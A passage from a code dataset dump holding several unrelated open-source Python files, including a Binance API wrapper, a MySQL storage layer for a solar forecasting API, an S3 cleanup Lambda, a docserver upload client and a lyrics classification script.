\"type\": \"status-complete\",\n \"value\": \"Balance updated, CARD BALANCE: \",\n }\n )\n )\n\n # download the data into the card\n\n sock.send(\n json.dumps(\n {\n \"type\": \"recharges\",\n \"value\": json.dumps(recharges),\n }\n )\n )\n\n \"\"\" match data.type:\n case \"new-selected-node\":\n sock.send(\n json.dumps(\n {\n \"type\": \"status\",\n \"value\": \"Please approach the card into the NFC device...\",\n }\n )\n ) \"\"\"\n\n # sock.send(data)\n\n\n# TO DO, SET UP SERIAL PORT HEARING\n\n\n@app.route(\"/get-nodes\", methods=[\"GET\"])\ndef getNodes():\n data = requests.get(\"http://localhost:3000/get-nodes\").json()\n\n global availableNodes\n\n availableNodes = data[:]\n\n return availableNodes\n\n\nif __name__ == \"__main__\":\n setup()\n app.run(host=\"0.0.0.0\", port=3001, debug=True)\n # app[\"TEMPLATES_AUTO_RELOAD\"] = True\n","repo_name":"Rulios/dtn-public-transport","sub_path":"metrobus-client/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16935601780","text":"import torch\nimport torch.nn as nn\n\n\nclass Metric(nn.Module):\n def __init__(self):\n super(Metric, self).__init__()\n self.metric = None\n\n def forward(self, pred, target):\n return self.metric(pred, target)\n\n\nclass DiceMetric(nn.Module):\n def __init__(self):\n super(DiceMetric, self).__init__()\n\n def forward(self, pred, target):\n \"\"\"calc dice\n\n Args:\n pred (torch.tensor): (N, H, W)\n target (torch.tensor): (N, H, W)\n\n Returns:\n (torch.tensor): dice\n \"\"\"\n\n pred = pred.float()\n target = target.float()\n smooth = 1e-4\n\n p = torch.sigmoid(pred) > 0.5\n t = target > 0.5\n\n inter = (t*p).sum(dim=2).sum(dim=1).float()\n dim1 = (p).sum(dim=2).sum(dim=1).float()\n dim2 = (t).sum(dim=2).sum(dim=1).float()\n\n coeff = (2 * inter + smooth) / (dim1 + dim2 + smooth)\n dice_total = 1-coeff.sum(dim=0)/coeff.size(0)\n return dice_total\n","repo_name":"gunjunlee/pytorch-YOLO-v1","sub_path":"metric/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"42075128502","text":"import 
traceback\nfrom binance.client import Client\nfrom datetime import datetime\nfrom math import log\n\nfrom BL.BinanceWebSocket import BinanceWebSocket\nfrom Common.Binance.AccountInfo import AccountInfo\nfrom Common.Binance.Balance import Balance\nfrom Common.Binance.Trade import Trade\nfrom Common.Binance.Candle import Candle\nfrom Common.Binance.OrderBookTicker import OrderBookTicker\nfrom Common.Binance.PriceTicker import PriceTicker\nfrom Common.Binance.PriceTicker24 import PriceTicker24\nfrom Common.Market import Market\nfrom Common.QcParameters import QcParameters\n\n\nclass BinanceLibrary:\n url_base = \"https://api.binance.com/api/v3/klines?symbol={}&interval={}&limit={}\"\n\n def __init__(self, api_key, api_secret):\n try:\n self.client = Client(api_key, api_secret)\n self.ws = None\n except:\n print(traceback.format_exc())\n\n def exit(self):\n try:\n if self.ws:\n self.ws.exit()\n except:\n print(traceback.format_exc())\n\n def get_candles(self, symbol, interval, limit=500, start_time=None, end_time=None):\n candles = None\n try:\n data = self.client.get_klines(symbol=symbol, interval=interval, limit=limit, startTime=start_time, endTime=end_time)\n candles = [Candle(symbol,interval,*d) for d in data]\n except:\n print(traceback.format_exc())\n return candles\n\n def get_markets(self, quote_assets):\n markets = []\n try:\n symbols = self.client.get_exchange_info()['symbols']\n #print(*symbols,sep='\\n')\n for symbol in symbols:\n if symbol['status'] != 'TRADING':\n continue\n if not quote_assets or (symbol['quoteAsset'] in quote_assets):\n market = Market(Symbol=symbol['symbol'], BaseAsset=symbol['baseAsset'], QuoteAsset=symbol['quoteAsset'])\n if symbol['filters']:\n for filter in symbol['filters']:\n if filter['filterType'] == 'MIN_NOTIONAL':\n market.MinAmountToTrade = float(filter['minNotional'])\n if filter['filterType'] == 'LOT_SIZE':\n market.AmountDecimalDigits = round(-log(float(filter['stepSize']),10))\n market.MinQuantity = float(filter['minQty'])\n markets.append(market)\n except:\n print(traceback.format_exc())\n return markets\n\n def get_account_info(self):\n info = None\n try:\n info = AccountInfo(*self.client.get_account(recvWindow=59000).values())\n except:\n print(traceback.format_exc())\n return info\n\n def get_asset_balance(self, asset):\n balance = None\n try:\n balance = Balance(*self.client.get_asset_balance(asset=asset, recvWindow=59000).values())\n except:\n print(traceback.format_exc())\n return balance\n\n def get_server_time(self):\n server_time = None\n try:\n server_time = int(self.client.get_server_time()[\"serverTime\"])\n except:\n print(traceback.format_exc())\n return server_time\n\n def get_orderbook(self):\n order_book = None\n try:\n order_book = [OrderBookTicker(*ticker) for ticker in self.client.get_orderbook_tickers()]\n except:\n print(traceback.format_exc())\n return order_book\n\n def get_price_ticker(self, symbol):\n price_ticker = None\n try:\n result = self.client.get_symbol_ticker(symbol=symbol)\n price_ticker = PriceTicker(*result.values())\n except:\n print(traceback.format_exc())\n return price_ticker\n\n def get_price_ticker_24(self, symbol):\n price_ticker_24 = None\n try:\n result = self.client.get_ticker(symbol=symbol)\n price_ticker_24 = PriceTicker24(*result.values())\n except:\n print(traceback.format_exc())\n return price_ticker_24\n\n def get_trades(self, symbol):\n trades = None\n try:\n result = self.client.get_my_trades(symbol=symbol, recvWindow=59000)\n trades = [Trade(*trade.values()) for trade in result]\n 
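# A worked check of the LOT_SIZE arithmetic in get_markets() above: Binance
# reports stepSize as a decimal string parsed to a float like 0.001, and
# round(-log(stepSize, 10)) recovers the number of permitted decimal places.
from math import log

assert round(-log(0.001, 10)) == 3  # stepSize 0.001 -> 3 decimal digits
assert round(-log(1.0, 10)) == 0    # stepSize 1.0   -> whole units only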
except:\n print(traceback.format_exc())\n return trades\n\n def buy_asset(self, symbol, amount):\n try:\n return self.client.order_market_buy(\n symbol=symbol,\n quantity=amount, recvWindow=59000)\n except:\n print(traceback.format_exc())\n\n def sell_asset(self, symbol, amount):\n try:\n return self.client.order_market_sell(\n symbol=symbol,\n quantity=amount, recvWindow=59000)\n except:\n print(traceback.format_exc())\n\n def __convert_to_stream_names(self, symbols, interval):\n try:\n stream_names = []\n for symbol in symbols:\n stream_names.append(\"{}@kline_{}\".format(symbol.lower(), interval))\n return stream_names\n except:\n print(traceback.format_exc())\n\n ''' \n input:\n inverval: str\n markets: list of market objects\n '''\n def start_web_socket(self, symbols, interval, callback):\n try:\n print(\"start_web_socket\")\n streams = self.__convert_to_stream_names(symbols, interval)\n self.ws = BinanceWebSocket(self.client)\n self.ws.start(streams, callback)\n except:\n print(traceback.format_exc())\n\n def stop_web_socket(self):\n try:\n if self.ws:\n self.ws.stop()\n except:\n print(traceback.format_exc())\n\n\n","repo_name":"Senior-Develop/SWT-PYQT-APP","sub_path":"BL/BinanceLibrary.py","file_name":"BinanceLibrary.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"29275005602","text":"\"\"\"\nThis module is used to solve the count_case problem in a string from the\nfunctions and methods homework. This solution uses a for loop and islower\nfunction to count the case of the letters in the sentence\n\"\"\"\n\n# Author: Marvin DaCosta, Created June 27, 2020, Last Modified: June 28, 2020\n\n# YouTube video on how to use collections in python:\n# https://bit.ly/2NBaCV6\n\n# Create a sample string to be used in function\nSAMPLE_STRING = 'Hello Mr. Rogers, how are you this fine Tuesday?'\n\n\n# Create a function to loop through each character in the string\ndef count_loop(the_string):\n \"\"\"\n This function is used to loop through each charcter in the string and\n count each lower and upper case character and then return the count for each\n \"\"\"\n count_u = 0\n count_l = 0\n for case in the_string:\n if case.isupper():\n count_u += 1\n elif case.islower():\n count_l += 1\n return count_l, count_u\n\n\nlower, upper = count_loop(SAMPLE_STRING)\nprint(\"There are\", upper, \"upper case and \", lower, \\\n \"lower case characters in the string\")\n","repo_name":"BornRiot/Python.Udemy.Complete_Python_BootCamp","sub_path":"methods_and_functions/functions_and_methods_hw/count_case.py","file_name":"count_case.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"19951645732","text":"from contextlib import contextmanager\nimport datetime as dt\nfrom functools import partial\nimport json\nfrom typing import List, Callable, Dict, Any, Union, Optional\nfrom uuid import UUID\n\n\nfrom fastapi import Depends, HTTPException\nimport pandas as pd\nimport pymysql\nfrom pymysql import converters\nimport pytz\nfrom sqlalchemy.engine import create_engine # type: ignore\nfrom sqlalchemy.pool import QueuePool # type: ignore\n\n\nfrom . 
import settings, models, __version__\nfrom .auth import get_user_id\n\n\n# this is faster than using strftime\nTIMEFORMAT = \"'{0.year:04}-{0.month:02}-{0.day:02} {0.hour:02}:{0.minute:02}:{0.second:02}'\" # NOQA\n\n\ndef escape_timestamp(value, mapping=None):\n # adapted from the SolarForecastArbiter API under the above MIT license\n if value.tzinfo is not None:\n return TIMEFORMAT.format(value.tz_convert(\"UTC\"))\n else:\n return TIMEFORMAT.format(value)\n\n\ndef escape_datetime(value, mapping=None):\n # adapted from the SolarForecastArbiter API under the above MIT license\n if value.tzinfo is not None:\n return TIMEFORMAT.format(value.astimezone(dt.timezone.utc))\n else:\n return TIMEFORMAT.format(value)\n\n\ndef convert_datetime_utc(obj):\n # adapted from the SolarForecastArbiter API under the above MIT license\n unlocalized = converters.convert_datetime(obj)\n return pytz.utc.localize(unlocalized)\n\n\ndef _make_sql_connection_partial(\n host=None, port=None, user=None, password=None, database=None\n):\n # adapted from the SolarForecastArbiter API under the above MIT license\n conv = converters.conversions.copy()\n # either convert decimals to floats, or add decimals to schema\n conv[converters.FIELD_TYPE.DECIMAL] = float\n conv[converters.FIELD_TYPE.NEWDECIMAL] = float\n conv[converters.FIELD_TYPE.TIMESTAMP] = convert_datetime_utc\n conv[converters.FIELD_TYPE.DATETIME] = convert_datetime_utc\n conv[converters.FIELD_TYPE.JSON] = json.loads\n conv[UUID] = converters.escape_str\n conv[pd.Timestamp] = escape_timestamp\n conv[dt.datetime] = escape_datetime\n connect_kwargs = {\n \"host\": host or settings.mysql_host,\n \"port\": port or settings.mysql_port,\n \"user\": user or settings.mysql_user,\n \"password\": password or settings.mysql_password,\n \"database\": database or settings.mysql_database,\n \"binary_prefix\": True,\n \"conv\": conv,\n \"use_unicode\": True,\n \"charset\": \"utf8mb4\",\n \"init_command\": \"SET time_zone = '+00:00'\",\n }\n if settings.mysql_use_ssl:\n connect_kwargs[\"ssl\"] = {\"ssl\": True}\n getconn = partial(pymysql.connect, **connect_kwargs)\n return getconn\n\n\nengine = create_engine(\n \"mysql+pymysql://\",\n creator=_make_sql_connection_partial(),\n poolclass=QueuePool,\n pool_recycle=3600,\n pool_pre_ping=True,\n).pool\n\n\ndef ensure_user_exists(f: Callable) -> Callable:\n \"\"\"Decorator that ensures the DB user exists for the current auth0 ID.\n Only necessary on methods that require an existing user like create_*.\n \"\"\"\n\n def wrapper(cls, *args, **kwargs):\n cls.create_user_if_not_exists()\n return f(cls, *args, **kwargs)\n\n return wrapper\n\n\nclass StorageTransactionError(Exception):\n \"\"\"Errors raised in StorageInterface from missing method calls needed\n to complete a transaction\"\"\"\n\n pass\n\n\nclass StorageInterface:\n def __init__(self, user: str = Depends(get_user_id)):\n self.user = user\n self._cursor = None\n self.commit = True\n\n @property\n def cursor(self):\n if self._cursor is None:\n raise AttributeError(\"Cursor is only available within `start_transaction`\")\n return self._cursor\n\n @contextmanager\n def start_transaction(self):\n connection = engine.connect()\n cursor = connection.cursor(cursor=pymysql.cursors.DictCursor)\n self._cursor = cursor\n self._add_job_result_called = False\n self._final_job_status_set = False\n try:\n yield self\n except Exception:\n connection.rollback()\n raise\n else:\n if self.commit:\n connection.commit()\n finally:\n connection.close()\n self._cursor = None\n\n def 
try_query(self, query, args):\n # adapted from the SolarForecastArbiter API under the above MIT license\n try:\n self.cursor.execute(query, args)\n except (\n pymysql.err.OperationalError,\n pymysql.err.IntegrityError,\n pymysql.err.InternalError,\n pymysql.err.DataError,\n ) as err:\n ecode = err.args[0]\n msg = err.args[1]\n if ecode == 1142:\n raise HTTPException(status_code=404, detail=msg)\n elif ecode == 1062 or ecode == 1348:\n raise HTTPException(status_code=409, detail=msg)\n elif ecode == 3140 or ecode == 1406 or ecode == 1048 or ecode == 1054:\n raise HTTPException(status_code=400, detail=msg)\n else:\n raise\n\n def _call_procedure(\n self,\n procedure_name: str,\n *args,\n with_current_user: bool = True,\n ) -> dict:\n \"\"\"\n Can't user callproc since it doesn't properly use converters.\n Will not handle OUT or INOUT parameters without first setting\n local variables and retrieving from those variables\n \"\"\"\n # adapted from the SolarForecastArbiter API under the above MIT license\n if with_current_user:\n new_args = (self.user, *args)\n else:\n new_args = args\n query = f'CALL {procedure_name}({\",\".join([\"%s\"] * len(new_args))})'\n self.try_query(query, new_args)\n out: dict = self.cursor.fetchall()\n return out\n\n def _call_procedure_for_single(\n self,\n procedure_name: str,\n *args,\n with_current_user: bool = True,\n ) -> dict:\n \"\"\"Wrapper handling try/except logic when a single value is expected\"\"\"\n # adapted from the SolarForecastArbiter API under the above MIT license\n try:\n result: dict = self._call_procedure(\n procedure_name,\n *args,\n with_current_user=with_current_user,\n )[0]\n except IndexError:\n raise HTTPException(status_code=404)\n return result\n\n def create_user_if_not_exists(self) -> str:\n out: str = self._call_procedure_for_single(\"create_user_if_not_exists\")[\n \"user_id\"\n ]\n return out\n\n @ensure_user_exists\n def get_user(self) -> models.UserInfo:\n out = self._call_procedure_for_single(\"get_user\")\n out[\"object_id\"] = out.pop(\"user_id\")\n out[\"object_type\"] = \"user\"\n out[\"modified_at\"] = out[\"created_at\"]\n return models.UserInfo(**out)\n\n def _parse_system(self, sys: Dict[str, Any]) -> models.StoredPVSystem:\n sys[\"object_id\"] = sys.pop(\"system_id\")\n sys[\"object_type\"] = \"system\"\n return models.StoredPVSystem(**sys)\n\n def list_systems(self) -> List[models.StoredPVSystem]:\n systems = self._call_procedure(\"list_systems\")\n out = []\n for sys in systems:\n out.append(self._parse_system(sys))\n return out\n\n @ensure_user_exists\n def create_system(self, system_def: models.PVSystem) -> models.StoredObjectID:\n created = self._call_procedure_for_single(\n \"create_system\", system_def.name, system_def.json()\n )\n return models.StoredObjectID(\n object_id=created[\"system_id\"], object_type=\"system\"\n )\n\n def get_system(self, system_id: UUID) -> models.StoredPVSystem:\n system = self._call_procedure_for_single(\"get_system\", system_id)\n return self._parse_system(system)\n\n def delete_system(self, system_id: UUID):\n self._call_procedure(\"delete_system\", system_id)\n\n def update_system(\n self, system_id: UUID, system_def: models.PVSystem\n ) -> models.StoredObjectID:\n self._call_procedure(\n \"update_system\", system_id, system_def.name, system_def.json()\n )\n return models.StoredObjectID(object_id=system_id, object_type=\"system\")\n\n def get_system_hash(self, system_id: UUID) -> str:\n out: str = self._call_procedure_for_single(\"get_system_hash\", system_id)[\n \"system_hash\"\n 
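# For reference, the query string that _call_procedure() builds above: with
# the current user prepended, one call argument becomes two %s placeholders
# (the argument values here are hypothetical).
args = ('auth0|user', 'system-uuid')
query = f'CALL get_system({",".join(["%s"] * len(args))})'
assert query == 'CALL get_system(%s,%s)'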
]\n return out\n\n @ensure_user_exists\n def create_system_model_data(self, system_id: UUID, dataset: models.DatasetEnum):\n self._call_procedure(\"create_system_data\", system_id, dataset)\n\n def get_system_model_meta(\n self, system_id: UUID, dataset: models.DatasetEnum\n ) -> models.SystemDataMeta:\n out = self._call_procedure_for_single(\n \"get_system_data_meta\", system_id, dataset\n )\n stored_hash = out.pop(\"system_hash\")\n if stored_hash is not None:\n current_hash = self.get_system_hash(system_id)\n out[\"system_modified\"] = stored_hash.lower() != current_hash\n else:\n out[\"system_modified\"] = False\n # present \"prepared\" status as \"queued\"\n if out[\"status\"] == \"prepared\":\n out[\"status\"] = \"queued\"\n return models.SystemDataMeta(**out)\n\n def update_system_model_data(\n self,\n system_id: UUID,\n dataset: models.DatasetEnum,\n system_hash: str,\n timeseries_data: Optional[bytes],\n statistics: Optional[bytes],\n error: Union[dict, List[dict]] = [],\n ):\n self._call_procedure(\n \"update_system_data\",\n system_id,\n dataset,\n timeseries_data,\n statistics,\n json.dumps(error),\n __version__,\n system_hash,\n )\n\n def get_system_model_timeseries(\n self, system_id: UUID, dataset: models.DatasetEnum\n ) -> bytes:\n res = self._call_procedure_for_single(\n \"get_system_timeseries\", system_id, dataset\n )\n if res[\"timeseries\"] is None:\n raise HTTPException(status_code=404, detail=\"No timeseries data available\")\n out: bytes = res[\"timeseries\"]\n return out\n\n def get_system_model_statistics(\n self, system_id: UUID, dataset: models.DatasetEnum\n ) -> bytes:\n res = self._call_procedure_for_single(\n \"get_system_statistics\", system_id, dataset\n )\n if res[\"statistics\"] is None:\n raise HTTPException(status_code=404, detail=\"No statistics available\")\n out: bytes = res[\"statistics\"]\n return out\n\n @ensure_user_exists\n def create_system_group(self, name: str):\n created = self._call_procedure_for_single(\"create_system_group\", name)\n return models.StoredObjectID(\n object_id=created[\"group_id\"], object_type=\"system_group\"\n )\n\n def update_system_group(self, group_id: UUID, name: str):\n self._call_procedure(\"update_system_group\", group_id, name)\n return models.StoredObjectID(object_id=group_id, object_type=\"system_group\")\n\n def delete_system_group(self, group_id: UUID):\n self._call_procedure(\"delete_system_group\", group_id)\n\n def _parse_system_group(self, group, group_systems=None):\n definition = {\"name\": group.pop(\"name\")}\n if group_systems is not None:\n # systems are an optional field, so that when we're listing\n # groups, we don't have to make so many calls\n systems = [self._parse_system(sys) for sys in group_systems]\n definition[\"systems\"] = systems\n group[\"object_id\"] = group.pop(\"group_id\")\n group[\"object_type\"] = \"system_group\"\n group[\"definition\"] = definition\n return models.StoredSystemGroup(**group)\n\n def get_system_group(self, group_id: UUID):\n group = self._call_procedure_for_single(\"get_system_group\", group_id)\n group_systems = self._call_procedure(\"get_group_systems\", group_id)\n return self._parse_system_group(group, group_systems)\n\n def list_system_groups(self):\n groups = self._call_procedure(\"list_system_groups\")\n out = []\n for group in groups:\n out.append(self._parse_system_group(group))\n return out\n\n def add_system_to_group(self, system_id: UUID, group_id: UUID):\n self._call_procedure(\"add_system_to_group\", system_id, group_id)\n\n def 
remove_system_from_group(self, system_id: UUID, group_id: UUID):\n self._call_procedure(\"remove_system_from_group\", system_id, group_id)\n\n\nclass ComputeManagementInterface(StorageInterface):\n \"\"\"A special interface to the database (that requires different permissions)\n to list all computations and allow setting a failure message on a computation.\n \"\"\"\n\n def __init__(self):\n self._cursor = None\n self.commit = True\n\n def list_system_data_status(self) -> List[models.ManagementSystemDataStatus]:\n with self.start_transaction() as st:\n res = st._call_procedure(\"list_system_data_status\", with_current_user=False)\n\n def repq(d):\n if d[\"status\"] == \"prepared\":\n d[\"status\"] = \"queued\"\n return d\n\n return [models.ManagementSystemDataStatus(**repq(r)) for r in res]\n\n def report_failure(self, system_id: str, dataset: str, message: str):\n with self.start_transaction() as st:\n st._call_procedure(\n \"report_failure\", system_id, dataset, message, with_current_user=False\n )\n","repo_name":"UARENForecasting/ESPRR","sub_path":"api/esprr_api/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":13563,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"32007001876","text":"import boto3\nimport re\nimport os\n\n\ndef get_s3_client():\n \"\"\"\n Get S3 Client from boto3\n :return:\n \"\"\"\n return boto3.client('s3')\n\n\ndef delete_objects_from_bucket(bucket_name: str, object_keys: list):\n client = get_s3_client()\n print(object_keys)\n client.delete_objects(Bucket=bucket_name, Delete={\"Objects\": [{\"Key\": key} for key in object_keys]})\n\n\ndef find_objects_by_tag(bucket_name: str, key_name: str, value_pattern: str):\n client = get_s3_client()\n paginator = client.get_paginator(\"list_objects_v2\")\n found_keys = []\n for result in paginator.paginate(Bucket=bucket_name):\n bucket_objects = result.get(\"Contents\", [])\n for obj in bucket_objects:\n object_tags = client.get_object_tagging(Bucket=bucket_name, Key=obj[\"Key\"])\n all_tags = object_tags.get(\"TagSet\", [])\n if len(all_tags) > 0 and any(\n tag.get(\"Key\") == key_name and re.match(value_pattern, tag.get(\"Value\")) for tag in all_tags):\n found_keys.append(obj.get(\"Key\"))\n return found_keys\n\n\ndef find_objects_by_metadata(bucket_name: str, key_name: str, value_pattern: str):\n client = get_s3_client()\n paginator = client.get_paginator(\"list_objects_v2\")\n found_keys = []\n for result in paginator.paginate(Bucket=bucket_name):\n bucket_objects = result.get(\"Contents\", [])\n for obj in bucket_objects:\n object_meta_data = client.head_object(Bucket=bucket_name, Key=obj[\"Key\"])\n all_meta_tags = object_meta_data.get(\"Metadata\", [])\n if re.match(value_pattern, all_meta_tags.get(key_name)):\n found_keys.append(obj.get(\"Key\"))\n return found_keys\n\n\ndef handler(event, context):\n \"\"\"\n Lambda Handler to delete objects from bucket using tags and meta data\n :param event:\n :param context:\n :return:\n \"\"\"\n # find objects if their tag key name is user_name and its value contains ch\n delete_keys_tags = find_objects_by_tag(bucket_name=os.environ[\"BUCKET_NAME\"], key_name=\"user_name\",\n value_pattern=\".*ch.*\")\n # find objects if their metadata email has .org at last\n delete_keys_meta = find_objects_by_metadata(bucket_name=os.environ[\"BUCKET_NAME\"], key_name=\"email\",\n value_pattern=\".*\\.org\")\n # delete the objects found above\n\n 
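# S3's DeleteObjects API accepts at most 1000 keys per request, so for large
# match sets the two delete calls below would need batching; a minimal sketch
# reusing the module's own helper:
def delete_objects_in_batches(bucket_name, object_keys, batch_size=1000):
    for i in range(0, len(object_keys), batch_size):
        delete_objects_from_bucket(bucket_name, object_keys[i:i + batch_size])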
delete_objects_from_bucket(bucket_name=os.environ[\"BUCKET_NAME\"], object_keys=delete_keys_meta)\n delete_objects_from_bucket(bucket_name=os.environ[\"BUCKET_NAME\"], object_keys=delete_keys_tags)\n return \"Success\"\n\n\nif __name__ == \"__main__\":\n handler(None, None)\n","repo_name":"404shades/RohanIPATrainingAWS","sub_path":"lambda/s3_query_select_delete/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72894649193","text":"\"\"\"Test the logger extension module.\"\"\"\n# pylint: disable=protected-access,redefined-outer-name,unused-variable,invalid-name\nimport importlib\nimport sys\nimport unittest\n\nimport sentry_sdk\nfrom flask import Flask\n\nimport flask_logger\n\nTEST_DSN = 'http://foo:bar@sentry.local/1?timeout=1'\n\n\ndef create_app():\n \"\"\"Create a Flask app for context.\"\"\"\n app = Flask(__name__)\n return app\n\n\nclass TestSentrySdkImport(unittest.TestCase):\n \"\"\"Test logger when sentrysdk isn't installed.\"\"\"\n\n def setUp(self):\n \"\"\"Set up tests.\"\"\"\n # Force flask_logger to load without sentry_sdk in the environment\n sys.modules['sentry_sdk'] = None\n importlib.reload(flask_logger.extension)\n self.app = create_app()\n self.ctx = self.app.app_context()\n self.ctx.push()\n\n def tearDown(self):\n \"\"\"Tear down tests.\"\"\"\n self.ctx.pop()\n # reset any mock loggers at module level\n # pylint: disable=invalid-name\n LOGGERS = {} # noqa\n sys.modules['sentry_sdk'] = sentry_sdk\n # Reload flask logger to restore sys.modules to correct state\n importlib.reload(flask_logger.extension)\n\n def test_log_without_sentrysdk(self):\n \"\"\"Test establishing logger when sentry_sdk isn't installed.\"\"\"\n logger = flask_logger.Logger()\n logger.init_app(self.app)\n with self.assertRaises(Exception) as context:\n logger.error('no_sentry_sdk_logger', 'this will raise an exception', dsn=TEST_DSN)\n self.assertEqual(\n str(context.exception),\n 'If specifying SENTRY_DSN, sentry_sdk must be installed '\n '(pip install flask-logger[Sentry])'\n )\n","repo_name":"bbelyeu/flask-logger","sub_path":"flask_logger/tests/test_sentrysdk_import.py","file_name":"test_sentrysdk_import.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10787181573","text":"import configparser\nimport os\nimport csv\nfrom typing import Union\n\ndef print_message(message: str, level: int=0) -> None:\n colors = {\n 0: '\\x1b[0m', # DEFAULT (info)\n 1: '\\x1b[1;33m', # YEL (warn)\n 2: '\\x1b[1;31m', # RED (error)\n 3: '\\x1b[1;34m', # BLUE (success)\n }\n print(f\"{colors[level]}{message}{colors[0]}\")\n\ndef print_error(message: str) -> None:\n print_message(message, level=2)\n\ndef print_warning(message: str) -> None:\n print_message(message, level=1)\n\ndef print_success(message: str) -> None:\n print_message(message, level=3)\n\ndef get_config(configfile: str) -> Union[tuple, bool]:\n config = configparser.ConfigParser()\n with open(configfile) as file:\n config.read_file(file)\n if 'remote' in config:\n datauser = config.get('remote', 'datauser')\n serverip = config.get('remote', 'serverip')\n sudo = config.getboolean('remote', 'sudo')\n cachelimit = (config.getfloat('local_cache', 'limit') * 1073741824) # GB to bytes\n return (datauser, serverip, sudo, cachelimit)\n\n print_error(\"ERROR config section expected: remote\")\n return None\n\ndef 
read_source_dest_csv(filename: str) -> dict:\n source_to_dest = []\n with open(filename, \"r\") as csv_file:\n csv_reader = csv.reader(csv_file)\n for line in csv_reader:\n try:\n source, dest = \"/\" + line[0].strip().strip(\"/\"), \"/\" + line[1].strip().strip(\"/\")\n if source != \"/\" and dest != '/':\n source_to_dest.append((source, dest))\n else:\n print_warning(f\"WARNING: Cannot read line in csv, skipping: {line}\")\n except Exception:\n print_warning(f\"WARNING: Cannot read line in csv, skipping: {line}\")\n\n return source_to_dest\n\ndef create_dir(path: str) -> bool:\n \"\"\"\n Creates a local directory, if it does not exist.\n Returns True upon succes or existence. False otherwise.\n \"\"\"\n try:\n os.makedirs(path, exist_ok=True)\n return True\n except Exception:\n return False\n\ndef write_csv(success: list,\n failure: list,\n successpath: str,\n failurepath: str) -> None:\n with open(successpath, 'w') as out:\n csv_out = csv.writer(out)\n csv_out.writerow(['iRODS', 'local'])\n for row in success:\n csv_out.writerow(row)\n\n print_message(f\"Wrote succesful transfers to {successpath}\")\n\n with open(failurepath, 'w') as out:\n csv_out = csv.writer(out)\n csv_out.writerow(['iRODS', 'local', 'reason'])\n for row in failure:\n csv_out.writerow(row)\n\n print_message(f\"Wrote failed transfers to {failurepath}\")\n","repo_name":"UtrechtUniversity/iBridges-SteppingStone","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31169559055","text":"import json\nimport os\nimport zipfile\n\nimport requests\n\n\nclass Client:\n\n def __init__(self, host, port=None, protocol='https', token=None):\n self.host = host\n self.port = port\n self.token = token\n self.protocol = protocol\n\n @property\n def base_url(self):\n if self.port:\n return f'{self.protocol}://{self.host}:{self.port}'\n else:\n return f'{self.protocol}://{self.host}'\n\n def get_upload_token(self, api_token):\n r = requests.get(f'{self.base_url}/api/auth/token/upload', headers={'Authorization': f'Bearer {api_token}'})\n r.raise_for_status()\n self.token = r.json()['access_token']\n\n @staticmethod\n def create_zipfile(html_path, working_dir=None):\n if working_dir is None:\n working_dir = os.getcwd()\n zip_fname = os.path.join(working_dir, 'docs-upload.zip')\n zipf = zipfile.ZipFile(zip_fname, 'w', zipfile.ZIP_DEFLATED)\n for dirname, _, files in os.walk(html_path):\n for filename in files:\n filepath = os.path.join(dirname, filename)\n zipf.write(filepath, arcname=os.path.relpath(filepath, html_path))\n zipf.close()\n return zip_fname\n\n def upload_zipfile(self, zipfile, name, version, repository, tags=None, ):\n if tags is None:\n tags = list()\n values = json.dumps({'version': version,\n 'name': name,\n 'repository': repository,\n 'tags': tags})\n response = requests.post(f'{self.base_url}/api/docs/upload', data=values,\n headers={'Authorization': f'Bearer {self.token}'})\n response.raise_for_status()\n upload_url = response.content.decode().split('Location: ')[1][:-1]\n response = requests.put(upload_url, files={'documentation': ('docs-upload.zip', open(zipfile, 'rb').read())},\n headers={'Authorization': f'Bearer {self.token}'})\n response.raise_for_status()\n return response\n\n def upload_dir(self, html_path, name, version, repository, tags=None, working_dir=None):\n self.upload_zipfile(self.create_zipfile(html_path, working_dir), name, version, repository, 
tags)\n","repo_name":"djpugh/docserver","sub_path":"src/docserver/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74070097193","text":"import pandas as pd\nimport json\nimport re\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nimport numpy as np\nimport warnings\nfrom sklearn.model_selection import train_test_split\nimport jsonlines\nfrom sklearn.naive_bayes import MultinomialNB\n\nwarnings.filterwarnings('ignore')\n\nlist_artists = ['Queen', 'Muse', 'Janelle Monáe', 'Hot Chip',\n                'LCD Soundsystem', 'The Postal Service',\n                'Daft Punk', 'The Strokes']\n\ndf = pd.read_json('lyrics.jl', lines=True)\ndf_fix = df[df.titles != '']\nfor artist in list_artists:\n    df_fix.loc[df_fix.artists.str.contains(artist), 'main_artist']=artist\n\ndf_fix = df_fix.dropna()\n\ndf_fix = df_fix.drop_duplicates(subset = 'lyrics')\ndf_fix.titles.value_counts().head(20)\ndf_fix[df_fix['titles']=='Invincible']\ndf_nodupe = df_fix.drop_duplicates(subset = ['titles', 'main_artist'])\ndf_nodupe.loc[:,'lyrics'] = df_nodupe['lyrics'].str.replace('\\r\\n', ' ') #could probably do this better with regex\ndf_nodupe.loc[:,'lyrics'] = df_nodupe['lyrics'].str.replace('\\n', ' ')\ndf_nodupe.drop_duplicates(subset = 